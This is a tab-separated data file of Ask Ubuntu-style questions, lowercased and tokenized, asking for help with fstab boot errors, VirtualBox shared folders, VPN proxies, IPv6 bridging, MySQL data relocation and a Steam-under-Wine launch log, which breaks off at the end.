514148	s to skip mount or m for manual recovery	i get this error , but do n't usually have enough time to consider my options as it boots automatically . i do n't know how to screenshot but this is far as i felt i should go without step by step guidance . i keep reading up on fstab but that 's where my understanding ends . i managed to get to the text editor not knowing what to do with this ... # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # /boot was on /dev/sda2 during installation uuid=171d34b7-bdfc-4026-96d8-51d2900e56f9 /boot ext2 defaults 0 2 # /boot/efi was on /dev/sda1 during installation uuid=2cc3-9aca /boot/efi vfat defaults 0 1 /dev/mapper/ubuntu -- vg-swap_1 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 what now ? i installed as encrypted fyi .
514152	linux server guest and windows host shared folder virtualbox	i 've been struggling to get this to work for 2 days now . i have a clean install of ubuntu 12.04 running in a vm in virtualbox on a windows server 2012 host system . i want to mount a shared folder ( as i used to do ) . so i followed the steps here to install the guest additions which always runs fine . to mount the drive i followed these steps . when these are installed i go to settings and add a shared folder and tick make permanent . afterwards the following command works fine : sudo mount -t vboxsf sharedfolder /mnt/sharedfolder i can then browse that directory . then i go to fstab and add the following line : sharedfolder /mnt/sharedfolder vboxsf 0 0 this does not seem to work . on boot i get the following error ( translated from dutch ) : /sbin/mount.vboxsf : mounting failed with the error : no such device . mountall : mount /mnt/sharedfolder [ 369 ] aborted with status code 1 mountall : filesystem could not be mounted : /mnt/sharedfolder after googling i found that i should add vboxsf to /etc/modules . so i did that . that did not help . so i reboot , see the error again , press s and try a manual mount with the command shown above . the command seems to succeed . i navigate to /mnt/sharedfolder and type in ll . the computer does not show any output and looks like it 's doing something . i reboot using shutdown via acpi . i remove the vboxsf from modules . reboot again . see the error . press s. now when i do the manual mount the command immediatly returns . i navigate to /mnt/sharedfolder and do ll . i see this : christophe @ begijnhof : /mnt/sharedfolder $ ll total 8 drwxr-xr-x 2 root root 4096 aug 21 09:55 ./ drwxr-xr-x 3 root root 4096 aug 21 09:55 ../ total 8 huh ? so i try to navigate to a folder i know is there named data , which works . i try ls -a again but it blocks so i have to restart . on the ubuntu wiki i also noticed i can use vboxfs instead of vboxsf , so i try that in a manual mount but it tells me there is no filesystem like that . so one thing left i could try is the `` mount automatically '' in the shared folder options for the sharedfolder in virtualbox . still the error on boot . manual mounting results in a blocking ll command once again . i am all out of ideas how to fix this . any help is greatly appreciated .
514154	how to replace gnome 3 notifications with unity 's notify-osd inside gnome ?	i want to replace gnome 3 notifications with the ones available on unity ( notify-osd , i think ? ) , how can i do this ?
514155	ubuntu 14.04 rtl8192cu blinking wifi led	i have a realtek wireless card and the blinking wifi led is driving me crazy . the installed driver it had was rtl8193cu but i had connectivity issues so i downgraded it to rtl8192cu and that 's when the blinking started . i read many threads where the fix was to simply put a .conf file in modprobe.d with the line `` options iwlwifi led_mode=1 '' and many variations of it like iwlegacy instead of iwlwifi and so on , but non of it fixed the problem . please help .
514157	set proxy for vpn server on ubuntu server 12.4	i have a vpn server with https , l2tp , openvpn , pptp . i want to set proxy in the server so all connection that comes from vpn clients use the proxy that i set in my server . i made a bash script file for it , but proxy not working . gsettings set org.gnome.system.proxy mode 'manual' gsettings set org.gnome.system.proxy.http enabled true gsettings set org.gnome.system.proxy.http host 'cproxy.anadolu.edu.tr' gsettings set org.gnome.system.proxy.http port 8080 gsettings set org.gnome.system.proxy.http authentication-user 'admin' gsettings set org.gnome.system.proxy.http authentication-password 'admin' gsettings set org.gnome.system.proxy use-same-proxy true export http_proxy=http : //admin : admin @ cproxy.anadolu.edu.tr:8080 export https_proxy=http : //admin : admin @ cproxy.anadolu.edu.tr:8080 export http_proxy=http : //admin : admin @ cproxy.anadolu.edu.tr:8080 export https_proxy=http : //admin : admin @ cproxy.anadolu.edu.tr:8080 now , i do n't know what to do to make a global proxy for server and all vpn clients use it automatically .
514159	ubuntu 14.04 : after login , top- and sidepanel do n't load and system settings do n't open	i have ubuntu 14.04 on a medion erazer with the nvidia gtx570m card . at first , while i had not installed the last nvidia driver , each time i would try to suspend my pc it would freeze frame on the login . once i managed to install the nvidia drivers , everything seemed to work up until i noticed that suddenly the system settings would not open anymore . i then rebooted my pc , but when i logged in i just end up with my cursor but no top panel or side pannel . thankfully , i had installed the gnome desktops which works , except for the fact the system settings do not open also in the gnome desktop . i have tried following : problems after upgrading to 14.04 ( only background and pointer after login ) except for reinstalling nvidia , since then i would be back at square one with suspend not working . when i try to launch system settings through the terminal , i get : simon @ simon-x681x : ~ $ unity-control-center libgl error : no matching fbconfigs or visuals found libgl error : failed to load driver : swrast ( unity-control-center:2806 ) : gdk-error ** : the program 'unity-control-center ' received an x window system error . this probably reflects a bug in the program . the error was 'badlength ( poly request too large or internal xlib length erro ' . ( details : serial 229 error_code 16 request_code 155 ( glx ) minor_code 1 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the gdk_synchronize environment variable to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) trace/breakpoint trap ( core dumped ) i know the 2 problems seem unrelated , but since they occured together , i am wondering if that is really the case . update : so i have now tried to do what the first post in unity does n't load , no launcher , no dash appears suggests . indeed , i enabled unity plugin , but it did not change anything , even after reboot . i then proceeded to do what user155373 and seth suggest to do . since then , i now have a black screen and not the standard background anymore and it still does not work . following the post by thomas arildsen i then tried : dconf reset -f /org/compiz/ unity -- reset-icons & disown i obtain an error which says : can not autolaunch d-bus without x11 $ display when i try to launch just unity in tty and exporting to the display : it stops after starting the compiz plugin ezoom i do n't know if its supposed to do that . and lastly the problem with system settings is not resolved . but i ca n't help to notice that the errors i described both talk about some x window . update : when i run dconf reset -f /org/compiz/ & & unity -- reset-icons & disown i get the following error message : unity.debug.interface debugdbusinterface.cpp : 216 unable to load entry point in libxpathselect : libxpathselect.so.1.4 . : can not open shared object file : no such file or directory compiz ( unityshell ) - error : gl_arb_vertex_buffer_object not supported unity.shell.compiz.unityshell.cpp : 3865 impossible to delete the unity locked stamp file compiz ( core ) - error : plugin initscreen failed : unityshell compiz ( core ) - error : failed to start plugin : unityshell and some other lines
514160	ubuntu + wacom intuos 4 + mypaint help !	please keep in mind i 'm not that computer savvy , but i will try any suggestion so please help me out ! my tablet will stop working if the usb connection is ever broken , or the ubuntu software is being updated . sometimes it will stop working for no reason that i can see . the lights will still be on , but it wo n't be responsive . it does n't work again until i restart the laptop with the tablet plugged in , which is grating if you have to do it every 25 min . or so ... i 'm not sure if the issue is with the port , the tablet/cable or the driver but any suggestions would be very welcome ! also , mypaint is frequently having hiccups . it seems to save fine but at times it will randomly close down and when i open files they 're often empty . they turn into 0kb files and only contain a single empty layer . also very grating , considering i lose days of work for no clear reason and without any heads up . again , i 'm not sure if the issue is with the port , the tablet/cable or the driver but any suggestions would be very welcome ! the error message reads ; traceback ( most recent call last ) : file `` /usr/share/mypaint/gui/application.py '' , line 177 , at_application_start ( *junk= ( ) ) else : self.filehandler.open_file ( fn ) variables : { 'fn ' : ( 'local ' , u'/home/maria/desktop/drawings/wips/sativa chibi.ora ' ) , 'self.filehandler.open_file ' : ( 'local ' , < bound method filehandler.wrapper of < gui.filehandling.filehandler object at 0x7fdb89063a10 > > ) } file `` /usr/share/mypaint/gui/drawwindow.py '' , line 60 , wrapper ( self= < gui.filehandling.filehandler object > , *args= ( u'/home/maria/desktop/drawings/wips/sativa chibi.ora ' , ) , **kwargs= { } ) try : func ( self , *args , **kwargs ) # gtk main loop may be called in here ... variables : { 'self ' : ( 'local ' , < gui.filehandling.filehandler object at 0x7fdb89063a10 > ) , 'args ' : ( 'local ' , ( u'/home/maria/desktop/drawings/wips/sativa chibi.ora ' , ) ) , 'func ' : ( 'local ' , < function open_file at 0x7fdb8b397b90 > ) , 'kwargs ' : ( 'local ' , { } ) } file `` /usr/share/mypaint/gui/filehandling.py '' , line 231 , open_file ( self= < gui.filehandling.filehandler object > , filename=u'/home/maria/desktop/drawings/wips/sativa chibi.ora ' ) try : self.doc.model.load ( filename , feedback_cb=self.gtk_main_tick ) except document.saveloaderror , e : variables : { 'self.doc.model.load ' : ( 'local ' , < bound method document.load of < lib.document.document instance at 0x7fdb8ab4f8c0 > > ) , 'feedback_cb ' : ( none , [ ] ) , 'self.gtk_main_tick ' : ( 'local ' , < function gtk_main_tick at 0x7fdb8b397b18 > ) , 'filename ' : ( 'local ' , u'/home/maria/desktop/drawings/wips/sativa chibi.ora ' ) } file `` /usr/share/mypaint/lib/document.py '' , line 544 , load ( self= < lib.document.document instance > , filename=u'/home/maria/desktop/drawings/wips/sativa chibi.ora ' , **kwargs= { 'feedback_cb ' : < function gtk_main_tick > } ) try : load ( filename , **kwargs ) except gobject.gerror , e : variables : { 'load ' : ( 'local ' , < bound method document.load_ora of < lib.document.document instance at 0x7fdb8ab4f8c0 > > ) , 'kwargs ' : ( 'local ' , { 'feedback_cb ' : < function gtk_main_tick at 0x7fdb8b397b18 > } ) , 'filename ' : ( 'local ' , u'/home/maria/desktop/drawings/wips/sativa chibi.ora ' ) } file `` /usr/share/mypaint/lib/document.py '' , line 772 , load_ora ( self= < lib.document.document instance > , filename=u'/home/maria/desktop/drawings/wips/sativa chibi.ora ' , feedback_cb= < function gtk_main_tick > ) tempdir = tempdir.decode ( sys.getfilesystemencoding ( ) ) z = zipfile.zipfile ( filename ) print 'mimetype : ' , z.read ( 'mimetype ' ) .strip ( ) variables : { 'zipfile.zipfile ' : ( 'global ' , < class 'zipfile.zipfile ' > ) , 'z ' : ( none , [ ] ) , 'filename ' : ( 'local ' , u'/home/maria/desktop/drawings/wips/sativa chibi.ora ' ) } file `` /usr/lib/python2.7/zipfile.py '' , line 770 , __init__ ( self= < zipfile.zipfile object > , file=u'/home/maria/desktop/drawings/wips/sativa chibi.ora ' , mode='r ' , compression=0 , allowzip64=false ) if key == 'r ' : self._realgetcontents ( ) elif key == 'w ' : variables : { 'self._realgetcontents ' : ( 'local ' , < bound method zipfile._realgetcontents of < zipfile.zipfile object at 0x7fdb9b952790 > > ) } file `` /usr/lib/python2.7/zipfile.py '' , line 811 , _realgetcontents ( self= < zipfile.zipfile object > ) if not endrec : raise badzipfile , `` file is not a zip file '' if self.debug > 1 : variables : { 'badzipfile ' : ( 'global ' , < class 'zipfile.badzipfile ' > ) } badzipfile : file is not a zip file
514162	bridged vm guest does not get ipv6 ra prefix from host	i have a similar problem and setup as described in ipv6 does not work over bridge . my host get a ipv6 prefix but the guest vm only gets a local fe80-prefix . using tcpdump i can see that solicit messages are going out from the guest but the host ( ubuntu-server ) does n't seem to respond : arne @ ubuntu-server : /var/log $ sudo tcpdump -i br0 host fe80 : :5054:00ff : fe4d:9ae0 tcpdump : verbose output suppressed , use -v or -vv for full protocol decode listening on br0 , link-type en10mb ( ethernet ) , capture size 65535 bytes 14:31:15.314419 ip6 fe80 : :5054 : ff : fe4d:9ae0 > ff02 : :16 : hbh icmp6 , multicast listener report v2 , 4 group record ( s ) , length 88 14:31:15.322337 ip6 fe80 : :5054 : ff : fe4d:9ae0 > ff02 : :16 : hbh icmp6 , multicast listener report v2 , 1 group record ( s ) , length 28 14:31:15.502374 ip6 fe80 : :5054 : ff : fe4d:9ae0 > ff02 : :16 : hbh icmp6 , multicast listener report v2 , 1 group record ( s ) , length 28 14:31:15.743894 ip6 fe80 : :5054 : ff : fe4d:9ae0.dhcpv6-client > ff02 : :1:2.dhcpv6-server : dhcp6 solicit 14:31:15.802389 ip6 fe80 : :5054 : ff : fe4d:9ae0 > ff02 : :16 : hbh icmp6 , multicast listener report v2 , 4 group record ( s ) , length 88 14:31:17.906580 ip6 fe80 : :5054 : ff : fe4d:9ae0.dhcpv6-client > ff02 : :1:2.dhcpv6-server : dhcp6 solicit i had a firewall issue which i fixed by adding the following ( copied from similar ipv4 before.rules settings ) to /etc/ufw/before6.rules at the end before the commit statement : # allow bridging ( for kvm ) -i forward -m physdev -- physdev-is-bridged -j accept i am running the host on a ubuntu 14.04 server so i guess i could have used dnsmasq but i did n't find any howto for it so i used radvd ( which had to be installed ) with the following configuration in /etc/radvd.conf : interface br0 { advsendadvert on ; advlinkmtu 1480 ; prefix 2a01:79d : xxx : :/64 { advonlink on ; advautonomous on ; } ; } ; this did n't help though so i guess i must have configured it wrong ? there is no /var/log/radvd.log as stated in the man page for radvd but i find error messages in syslog : aug 22 16:39:02 ubuntu-server radvd [ 11642 ] : our advotherconfigflag on br0 does n't agree with fe80 : :4470:3aff : fee5:2c1f aug 22 16:39:02 ubuntu-server radvd [ 11642 ] : our advvalidlifetime on br0 for 2a01:79d : xxx : : does n't agree with fe80 : :4470:3aff : fee5:2c1f aug 22 16:39:02 ubuntu-server radvd [ 11642 ] : our advpreferredlifetime on br0 for 2a01:79d : xxx : : does n't agree with fe80 : :4470:3aff : fee5:2c1f aug 22 16:39:02 ubuntu-server radvd [ 11642 ] : our advlinkmtu on br0 does n't agree with fe80 : :4470:3aff : fee5:2c1f i do n't know what fe80 : :4470:3aff : fee5:2c1f is pointing to . any help appreciated . br , arne ps : i wish the ubuntu documentation included how to configure virtualization to work with ipv6
514163	problem while updating 14.04 lts	when i updating ubuntu sudo apt-get update i get this error : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_trusty_main_i18n_translation-en % 5fin e : the package lists or status file could not be parsed or opened .
514164	installing samba 4 on 2 nic cards	i have multiple nic cards , where eth0 is connected to internet ( dhcp ) and eth1 is connected to lan with ip forwarding , i wan na install samba4 with active directory file server to manage my lan . would any1 help me with the process and installation guide .
514166	macbook keyboard problem	i 'm running ubuntu studio 14.04 on my macbook 3,1 . it worked well until today . the internal keyboard does n't work properly anymore . most keys do n't work at all , while a few produce the wrong characters . for example , the keys j , k and l produce the numbers 1 , 2 and 3 . it 's not a hardware issue , in mac os everything is still fine . my external keyboard also works correctly . can anybody help me ?
514167	how to start a firefox from cron ?	i need to run a java applet from a firefox . the problem is , i need to run this firefox from a cron . if i run from the command line and its work fine , but when put the command in the cron it failed : */1 * * * * firefox http : //domain.com/iqms/packetloss/iqmspacket2.html
514171	ubuntu 14.04 ati/intel hybrid graphics dpm	i have a dell inspiron 3521 with hybrid ati/intel graphics . ( amd radeon 7670m / intel hd 4000 ) using ubuntu 14.04 with open source drivers for graphics . ( xserver-xorg-video-ati ) i read that ubuntu 14.04 with the linux kernel version 3.13 supports auto switching between graphics and dynamic power management . is it correct ? anyway , if it is true , i dont think that it is working in my system , because fan runs constantly and battery backup is less than 2 hours . lspci | grep -i vga 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] thames [ radeon hd 7500m/7600m series ] ( rev ff ) what should i do ? is there any hope that this gets fixed in future kernels ?
514175	latest upgrade has `` killed '' my audio ! how do i get it back ?	i have just upgraded to the latest version of ubuntu . now , my sound does n't work . i 've attempted to find and install all updates and drivers and nothing seems to help . what do i need to do to get my audio back ?
514176	using curl command to download file in parts from different interfaces and to run the commands simultaneously from a script	i wanted to download a file using curl command simultaneously in different parts using ip aliasing ( virtual ethernet ports ) so what i did was pasted the commands in a text file and run but the problem as obvious since it is in a file the commands will be executed one by one so is there a way to run all those commands simultaneously . here is the command curl -- interface eth0:0 -- range 0,38010880 http : //wdl.cache.ijinshan.com/wps/download/linux/unstable/kingsoft-office_9.1.0.4244~a12p3_i386.deb -o kinsoft-office.part1 curl -- interface eth0:1 -- range 38010880 , - http : //wdl.cache.ijinshan.com/wps/download/linux/unstable/kingsoft-office_9.1.0.4244~a12p3_i386.deb -o kinsoft-office.part2 cat kinsoft-office.part* > kinsoft-office can anyone help me to run these above 2 commands simultaneously from the script so as to increase download speed
514178	how to enhance the screen of my vm ?	how can i enhance the size of my virtual machine ? i installed ubuntu 14.04 desktop edition ( lts ) on virtualbox but the screen looks to small . when i do ctrl+c the screen becomes bigger but it does not show more as the original small screen . my problem is displayed in this picture :
514182	how to make apps minimize to dock ?	i installed mac themes for ubuntu 12.04 and cairo dock . i want apps to minimize to cairo dock instead of the unity panel . before anyone recommends docky , i tried it and it had a lot of bugs . so is there any way by which apps will minimize to caro dock ? thank you . any answer will be appreciated .
514183	can i create bootable iso from copy of disk ?	according to this question , i can create bootable iso file because disk ( media source ) is bootable but consider if i have not bootable disk of os ( ex : ubuntu 14.04 ) but only copy of that disk in my computer , then can i make bootable iso file from that copy ? is it ok to create bootable iso from copy of os ? what are the steps i have to follow or it is requirement of any extra software then which ?
514186	symlink are using both locations ?	i 've researched and did n't find any answers , so i decided to ask here . the /dev/sda2 disk of my whm/cpanel webserver got 100 % full . the /var folder is on the /dev/sda2 disk and i 've found that the reason of 100 % full disk is the /var/lib/mysql folder . to fix it i need to move the /var/lib/mysql folder from /dev/sda2 to /home where i have a lot of space in disk . then i used the command lines : service mysql stop cp -r -p /var/lib/mysql/ /home/databasesmysql/ mv /var/lib/mysql /var/lib/mysql.backup/ ln -s /home/databasesmysql/ /var/lib/mysql service mysql start ok , now to check if its running at the new location i just renamed the /var/lib/mysql to /var/lib/mysql.backup and mysql stopped working . also when i rename the /home/databasesmysql folder mysql also stop to work . i do n't know whats happening , the symlink are using both locations ?
514188	playonlinux - steam games wo n't launch	i 'm running ubuntu gnome 14.04 . i installed steam through playonlinux and everything went fine . i installed some windows games through steam . when i click 'play ' to launch the game , i get a window saying preparing to launch ( insert game name ) for a second or 2 , then the window closes and nothing happens . i 've seen many threads about this issue out there , but none had a solution that worked for me , and many of these threads are dead . one of the things i tried was adding gameoverlayrenderer.dll in wine libraries and set it to disable . it did n't work . edit : following ducky 's suggestions , here are the playonlinux logs ( accessible through debug mode ) launching steam : urns a fake device notification handle ! fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x33d6d8,0x00000000 ) , stub ! fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x33d6d8,0x00000000 ) , stub ! fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x33d870,0x00000000 ) , stub ! fixme : win : enumdisplaydevicesw ( ( null ) ,1,0x33d870,0x00000000 ) , stub ! fixme : win : registerdevicenotificationw ( hwnd=0x10118 , filter=0xe1fe92c , flags=0x00000000 ) returns a fake device notification handle ! fixme : win : unregisterdevicenotification ( handle=0xcafeaffe ) , stub ! fixme : win : registerdevicenotificationw ( hwnd=0x20118 , filter=0xe1fe92c , flags=0x00000000 ) returns a fake device notification handle ! fixme : advapi : registertraceguidsw ( 0x100a3de0 , 0x12035da0 , { 3dada31d-19ef-4dc1-b345-037927193422 } , 1 , 0x11faf518 , ( null ) , ( null ) , 0x12035db8 ) : stub fixme : process : setprocessdeppolicy ( 3 ) : stub fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 fixme : advapi : registertraceguidsw ( 0x100a3de0 , 0x12035da0 , { 3dada31d-19ef-4dc1-b345-037927193422 } , 1 , 0x11faf518 , ( null ) , ( null ) , 0x12035db8 ) : stub fixme : gdi : gdiinitializelanguagepack stub [ 0821/165518 : error : renderer_main.cc ( 227 ) ] running without renderer sandbox fixme : module : load_library unsupported flag ( s ) used ( flags : 0x00000800 ) fixme : ver : getcurrentpackageid ( 0x1f5e9f8 ( nil ) ) : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventregister { 47a9201e-73b0-42ce-9821-7e134361bc6f } , 0x10056360 , 0x100d7648 , 0x100d7640 fixme : advapi : eventregister { 58a9201e-73b0-42ce-9821-7e134361bc70 } , 0x10056360 , 0x100d7680 , 0x100d7678 fixme : advapi : eventregister { 3fa9201e-73b0-43fe-9821-7e145359bc6f } , 0x10056360 , 0x100d7610 , 0x100d7608 fixme : advapi : eventregister { 1432afee-73b0-42ce-9821-7e134361b433 } , 0x10056360 , 0x100d76b8 , 0x100d76b0 fixme : advapi : eventregister { 4372afee-73b0-42ce-9821-7e134361b519 } , 0x10056360 , 0x100d76f0 , 0x100d76e8 fixme : imm : immgetopenstatus ( 0x135a48 ) : semi-stub fixme : ver : getcurrentpackageid ( 0x33f15c ( nil ) ) : stub fixme : mscoree : parse_supported_runtime sku=l '' .netframework , version=v4.0 , profile=client '' not implemented fixme : mscoree : clrmetahost_getruntime unrecognized version l '' v4.0 '' the entry point method could not be loaded fixme : imm : immreleasecontext ( ( nil ) , ( nil ) ) : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventregister { 47a9201e-73b0-42ce-9821-7e134361bc6f } , 0x10056360 , 0x100d7648 , 0x100d7640 fixme : advapi : eventregister { 58a9201e-73b0-42ce-9821-7e134361bc70 } , 0x10056360 , 0x100d7680 , 0x100d7678 fixme : advapi : eventregister { 3fa9201e-73b0-43fe-9821-7e145359bc6f } , 0x10056360 , 0x100d7610 , 0x100d7608 fixme : advapi : eventregister { 1432afee-73b0-42ce-9821-7e134361b433 } , 0x10056360 , 0x100d76b8 , 0x100d76b0 fixme : advapi : eventregister { 4372afee-73b0-42ce-9821-7e134361b519 } , 0x10056360 , 0x100d76f0 , 0x100d76e8 fixme : imm : immgetopenstatus ( 0x135a48 ) : semi-stub fixme : ver : getcurrentpackageid ( 0x33f15c ( nil ) ) : stub fixme : mscoree : parse_supported_runtime sku=l '' .netframework , version=v4.0 , profile=client '' not implemented fixme : mscoree : clrmetahost_getruntime unrecognized version l '' v4.0 '' the entry point method could not be loaded fixme : imm : immreleasecontext ( ( nil ) , ( nil ) ) : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : system : systemparametersinfow unknown action : 116 fixme : advapi : eventregister { 47a9201e-73b0-42ce-9821-7e134361bc6f } , 0x10056360 , 0x100d7648 , 0x100d7640 fixme : advapi : eventregister { 58a9201e-73b0-42ce-9821-7e134361bc70 } , 0x10056360 , 0x100d7680 , 0x100d7678 fixme : advapi : eventregister { 3fa9201e-73b0-43fe-9821-7e145359bc6f } , 0x10056360 , 0x100d7610 , 0x100d7608 fixme : advapi : eventregister { 1432afee-73b0-42ce-9821-7e134361b433 } , 0x10056360 , 0x100d76b8 , 0x100d76b0 fixme : advapi : eventregister { 4372afee-73b0-42ce-9821-7e134361b519 } , 0x10056360 , 0x100d76f0 , 0x100d76e8 fixme : imm : immgetopenstatus ( 0x135a48 ) : semi-stub fixme : ver : getcurrentpackageid ( 0x33f15c ( nil ) ) : stub fixme : mscoree : parse_supported_runtime sku=l '' .netframework , version=v4.0 , profile=client '' not implemented fixme : mscoree : clrmetahost_getruntime unrecognized version l '' v4.0 '' the entry point method could not be loaded fixme : imm : immreleasecontext ( ( nil ) , ( nil ) ) : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventregister { 47a9201e-73b0-42ce-9821-7e134361bc6f } , 0x10056360 , 0x100d7648 , 0x100d7640 fixme : advapi : eventregister { 58a9201e-73b0-42ce-9821-7e134361bc70 } , 0x10056360 , 0x100d7680 , 0x100d7678 fixme : advapi : eventregister { 3fa9201e-73b0-43fe-9821-7e145359bc6f } , 0x10056360 , 0x100d7610 , 0x100d7608 fixme : advapi : eventregister { 1432afee-73b0-42ce-9821-7e134361b433 } , 0x10056360 , 0x100d76b8 , 0x100d76b0 fixme : advapi : eventregister { 4372afee-73b0-42ce-9821-7e134361b519 } , 0x10056360 , 0x100d76f0 , 0x100d76e8 fixme : imm : immgetopenstatus ( 0x135a48 ) : semi-stub fixme : ver : getcurrentpackageid ( 0x33f15c ( nil ) ) : stub fixme : mscoree : parse_supported_runtime sku=l '' .netframework , version=v4.0 , profile=client '' not implemented fixme : mscoree : clrmetahost_getruntime unrecognized version l '' v4.0 '' the entry point method could not be loaded fixme : imm : immreleasecontext ( ( nil ) , ( nil ) ) : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : win : unregisterdevicenotification ( handle=0xcafeaffe ) , stub ! fixme : win : unregisterdevicenotification ( handle=0xcafecafe ) , stub ! fixme : advapi : unregistertraceguids 0 : stub fixme : win : unregisterdevicenotification ( handle=0xcafecafe ) , stub ! ipc client is in my process , could/should be using an in-process pipe.ipc client is in my process , could/should be using an in-process pipe.fixme : iphlpapi : cancelipchangenotify ( overlapped 0x9e103d0 ) : fixme : win : unregisterdevicenotification ( handle=0xcafeaffe ) , stub ! fixme : win : unregisterdevicenotification ( handle=0xcafeaffe ) , stub ! fixme : iphlpapi : cancelipchangenotify ( overlapped 0xb25f28 ) : stub fixme : advapi : unregistertraceguids 0 : stub forced create of win32mutex but it already existed forced create of win32event but it already existed forced create of win32event but it already existed fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub [ 2014-08-21 16:55:11 ] startup - updater built aug 13 2014 14:18:40 looks like steam did n't shutdown cleanly , scheduling immediate update check [ 2014-08-21 16:55:11 ] checking for update on startup [ 2014-08-21 16:55:11 ] checking for available updates ... [ 2014-08-21 16:55:12 ] download skipped : /client/steam_client_win32 version 1407966480 , installed version 1407966480 [ 2014-08-21 16:55:12 ] nothing to do [ 2014-08-21 16:55:12 ] verifying installation ... [ 2014-08-21 16:55:12 ] performing checksum verification of executable files [ 2014-08-21 16:55:12 ] verification complete [ 2014-08-21 16:57:50 ] shutdown [ 08/21/14 16:59:48 ] - running wine-1.7.22 steam.exe ( working directory : /home/nils/.playonlinux/wineprefix/steam_wine/drive_c/program files/steam ) [ 0821/165951 : error : network_change_notifier_win.cc ( 174 ) ] wsalookupservicebegin failed with : 8 [ 0821/165951 : error : gpu_info_collector_win.cc ( 103 ) ] ca n't retrieve a valid winsat assessment . [ 0821/165957 : error : renderer_main.cc ( 227 ) ] running without renderer sandbox the entry point method could not be loaded ipc client is in my process , could/should be using an in-process pipe.ipc client is in my process , could/should be using an in-process pipe.forced create of win32mutex but it already existed forced create of win32event but it already existed forced create of win32event but it already existed [ 2014-08-21 16:59:49 ] startup - updater built aug 13 2014 14:18:40 looks like steam did n't shutdown cleanly , scheduling immediate update check [ 2014-08-21 16:59:49 ] checking for update on startup [ 2014-08-21 16:59:49 ] checking for available updates ... [ 2014-08-21 16:59:50 ] download skipped : /client/steam_client_win32 version 1407966480 , installed version 1407966480 [ 2014-08-21 16:59:50 ] nothing to do [ 2014-08-21 16:59:50 ] verifying installation ... [ 2014-08-21 16:59:50 ] performing checksum verification of executable files [ 2014-08-21 16:59:50 ] verification complete [ 2014-08-21 17:00:12 ] shutdown [ 08/21/14 17:00:22 ] - running wine-1.7.22 winecfg ( working directory : /usr/share/playonlinux/python ) [ 08/21/14 17:00:58 ] - running wine-1.7.22 steam.exe ( working directory : /home/nils/.playonlinux/wineprefix/steam_wine/drive_c/program files/steam ) [ 0821/170100 : error : network_change_notifier_win.cc ( 174 ) ] wsalookupservicebegin failed with : 8 [ 0821/170100 : error : gpu_info_collector_win.cc ( 103 ) ] ca n't retrieve a valid winsat assessment . [ 0821/170106 : error : renderer_main.cc ( 227 ) ] running without renderer sandbox the entry point method could not be loaded ipc client is in my process , could/should be using an in-process pipe.ipc client is in my process , could/should be using an in-process pipe.forced create of win32mutex but it already existed forced create of win32event but it already existed forced create of win32event but it already existed [ 2014-08-21 17:00:59 ] startup - updater built aug 13 2014 14:18:40 [ 2014-08-21 17:00:59 ] verifying installation ... [ 2014-08-21 17:01:00 ] verification complete [ 2014-08-21 17:01:20 ] shutdown [ 08/21/14 17:01:30 ] - running wine-1.7.22 steam.exe ( working directory : /home/nils/.playonlinux/wineprefix/steam_wine/drive_c/program files/steam ) fixme : ver : getcurrentpackageid ( 0x33e490 ( nil ) ) : stub fixme : advapi : eventregister { 47a9201e-73b0-42ce-9821-7e134361bc6f } , 0x3f006c60 , 0x3f03fce8 , 0x3f03fce0 fixme : advapi : eventregister { 58a9201e-73b0-42ce-9821-7e134361bc70 } , 0x3f006c60 , 0x3f03fd20 , 0x3f03fd18 fixme : advapi : eventregister { 3fa9201e-73b0-43fe-9821-7e145359bc6f } , 0x3f006c60 , 0x3f03fcb0 , 0x3f03fca8 fixme : advapi : eventregister { 1432afee-73b0-42ce-9821-7e134361b433 } , 0x3f006c60 , 0x3f03fd58 , 0x3f03fd50 fixme : advapi : eventregister { 4372afee-73b0-42ce-9821-7e134361b519 } , 0x3f006c60 , 0x3f03fd90 , 0x3f03fd88 fixme : advapi : eventregister { 47a9201e-73b0-42ce-9821-7e134361bc6f } , 0x3f006c60 , 0x3f03fce8 , 0x3f03fce0 fixme : advapi : eventregister { 58a9201e-73b0-42ce-9821-7e134361bc70 } , 0x3f006c60 , 0x3f03fd20 , 0x3f03fd18 fixme : advapi : eventregister { 3fa9201e-73b0-43fe-9821-7e145359bc6f } , 0x3f006c60 , 0x3f03fcb0 , 0x3f03fca8 fixme : advapi : eventregister { 1432afee-73b0-42ce-9821-7e134361b433 } , 0x3f006c60 , 0x3f03fd58 , 0x3f03fd50 